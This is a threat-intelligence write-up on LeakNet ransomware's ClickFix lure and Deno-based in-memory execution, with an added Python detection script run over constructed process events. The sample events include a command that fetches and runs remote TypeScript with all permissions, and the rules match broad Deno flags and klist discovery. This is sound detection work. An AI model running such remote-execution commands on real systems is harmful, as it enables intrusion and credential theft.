LeakNet ransomware has evolved its tactics by adopting the ClickFix social engineering technique for initial access. Rather than exploiting a vulnerability, ClickFix uses a deceptive browser prompt to talk the user into copying a command and running it themselves, so the first malicious process is launched from the user's own session. Once inside, the group uses a "Bring Your Own Runtime" (BYOR) strategy: it deploys the legitimate, signed Deno runtime and has it execute malicious JavaScript and TypeScript directly in memory, with no custom loader written to disk.
By leveraging Deno, LeakNet minimizes its forensic footprint and sidesteps signature-based controls that would flag a custom loader; because the runtime binary itself is legitimately signed, blocking by hash or publisher does not help, and detection has to key on how Deno is launched and what it spawns. Post-exploitation activities include host fingerprinting, DLL sideloading, and Kerberos ticket enumeration with klist. The group maintains persistence through a polling loop and uses Amazon S3 buckets for data exfiltration, signaling a shift toward stealthier attacks built on developer tooling.
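The behavioural angle above is easier to reason about as a concrete rule. The following is an added example, not code from the original post or from any vendor: it evaluates a few hypothetical Sysmon-style process-creation records (constructed here, with assumed field names, paths and URLs) and flags the Deno launch chain the article describes, namely a signed Deno binary started from an interactive parent, running code from a URL or inline `eval`, with broad permission flags, and a `klist` child spawned by Deno. The parent-process set and the permission-flag list are the author's assumptions, not something the article states.

```python
# Added example (not from the original post): behavioural rules for a
# LeakNet-style Deno (BYOR) launch and klist discovery, run over constructed
# Sysmon-like process-creation records. Field names, paths, URLs and the
# parent/flag lists below are assumptions for illustration.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str           # full path of the created process
    parent_image: str    # full path of its parent
    command_line: str


# Interactive launchers a ClickFix victim typically pastes a command into (assumed).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}

# Deno flags that hand the script network, filesystem or child-process access.
BROAD_PERMS = re.compile(
    r"(?:^|\s)(?:-A|--allow-all|--allow-net|--allow-run|--allow-write)(?:=|\s|$)"
)
# `deno run <src>` / `deno eval <code>`; group 1 tells us which subcommand.
RUN_OR_EVAL = re.compile(r'\bdeno(?:\.exe)?"?\s+(run|eval)\b', re.IGNORECASE)
HAS_URL = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name, tolerant of Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of the rules that fire for one event (empty = nothing suspicious)."""
    hits: list[str] = []
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    m = RUN_OR_EVAL.search(cmd)
    if img == "deno.exe" and m:
        # Code fetched from a URL or passed inline never lands on disk as a script file.
        if m.group(1).lower() == "eval" or HAS_URL.search(cmd):
            hits.append("deno_remote_or_inline_code")
        if BROAD_PERMS.search(cmd):
            hits.append("deno_broad_permissions")
        if parent in INTERACTIVE_PARENTS:
            hits.append("deno_from_interactive_parent")   # ClickFix-style launch
    if img == "klist.exe" and parent == "deno.exe":
        hits.append("klist_spawned_by_deno")               # Kerberos ticket enumeration
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> rule hits, keeping only events that fired at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


# Constructed sample telemetry; every path, user and URL here is made up.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\deno\deno.exe", r"C:\Windows\explorer.exe",
              "deno.exe run -A --no-check https://example.invalid/init.ts"),
    ProcEvent(r"C:\Windows\System32\klist.exe",
              r"C:\Users\alice\AppData\Local\deno\deno.exe", "klist"),
    # Benign developer use: local script, narrow read-only permission, IDE parent.
    ProcEvent(r"C:\tools\deno\deno.exe", r"C:\Program Files\Code\Code.exe",
              "deno.exe run --allow-read=. .\\build.ts"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, basename(SAMPLE_EVENTS[i].image), hits)
```

The fourth sample event is the false-positive check: a developer running a local script with a scoped `--allow-read` from an editor fires nothing, while the remote-URL launch from `explorer.exe` and the `klist` child of Deno both do. In a real deployment the parent list and permission flags should be tuned to the environment, and the URL check should be paired with outbound connection telemetry from the same process.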